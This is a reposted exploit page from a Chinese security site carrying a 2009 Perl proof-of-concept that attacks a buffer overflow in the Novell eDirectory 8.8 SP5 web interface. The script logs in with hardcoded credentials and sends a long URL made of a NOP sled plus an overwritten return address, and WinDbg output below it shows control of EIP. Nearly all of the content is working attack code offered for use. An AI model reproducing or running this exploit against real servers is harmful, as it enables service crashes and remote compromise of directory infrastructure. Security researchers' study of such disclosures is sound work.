首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell eDirectory version 8.8 SP5 for Windows proof of concept buffer overflow e
来源:http://tcc.hellcode.net/ 作者:murderkey 发布时间:2009-10-27  
#PoC for Vulnerability:
#!usr\bin\perl
#Novell eDirectory 8.8 SP5 BoF Vuln - 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net || www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"
#http://www.youtube.com/watch?v=6bloyjV-Hhs

use WWW::Mechanize; 

use LWP::Debug qw(+);

use HTTP::Cookies;

$target=$ARGV[0]; 


if(!$ARGV[0]){

        print "Novell eDirectory 8.8 SP5 Exploit\n";

        print "Hellcode Research || Hellcode.net\n";

        print "Usage:perl $0 [target]\n";
	
exit();
}



$login_url = "$target/_LOGIN_SERVER_";

$url = "$target/dhost/";

$vuln = "modules?L:";

$nop = "\x90" x 1668;

$eip = "\xef\xbe\xad\xde";

$data = "B" x 235;


$hellcode = $vuln.$nop.$eip.$data;

########Write your usr and pwd########

	  $username = "Admin.context";
 
 	  $password = "1234"; 

 
my $mechanize = WWW::Mechanize->new();


$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));


$mechanize->timeout($url_timeout); 

$res = $mechanize->request(HTTP::Request->new('GET', "$login_url")); 


    $mechanize->submit_form( 

                  form_name => "authenticator", 

                  fields    => {        
            
                     usr => $username, 

                     pwd => $password}, 

                     button => 'Login'); 

$response2 = $mechanize->get("$url$hellcode");



##Debugger Results of PoC:

Windbg- File>Attach to a process>dhost.exe

eax=7ff43000 ebx=00000000 ecx=00000000 edx=778ad094 esi=00000000 edi=00000000
eip=77867dfe esp=1630ff5c ebp=1630ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  
Defaulted to export symbols for C:\Windows\system32\ntdll.dll - 
ntdll!DbgBreakPoint:
77867dfe cc              int     3
0:088> g

Debuggee is running...


##C:\Users\DELL\Videos\karak0rsan\Perl\bin>perl novelbof.pl

##Debugger Results after running poc:

(1cc.1d44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000042 ebx=15700796 ecx=038af878 edx=038b0000 esi=038af62c edi=038af878
eip=75c11684 esp=038af5c0 ebp=038af660 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  
Defaulted to export symbols for 
C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.3053_none_d08d7bba442a9b36\MSVCR80.dll - 
MSVCR80!vfwprintf_p+0x5b:
75c11684 8802            mov     byte ptr [edx],al          ds:0023:038b0000=??

-- EAX = 00000042 (writed a part of eax)

##0:010> g

(8e4.bb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=deadbeef edx=77879bad esi=00000000 edi=00000000
eip=deadbeef esp=036bf1f0 ebp=036bf210 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
deadbeef ??              ???

#EIP=deadbeef - We controled eip ;)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RunCms v.2M1 /modules/forum/po
·TFTgallery 0.13 is vulnerable
·RunCMS version 2M1 store() rem
·Pegasus Mail Client version 4.
·Cherokee web server version 0.
·Eureka Mail Client version 2.2
·xp-AntiSpy <= 3.9.7-4 Local (.
·nginx remote null pointer dere
·U3D CLODProgressiveMeshDeclara
·Boloto Media Player 1.0.0.9 Lo
·VMWare Workstation Virtual 808
·GPG2/Kleopatra 2.0.11 - Malfor
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved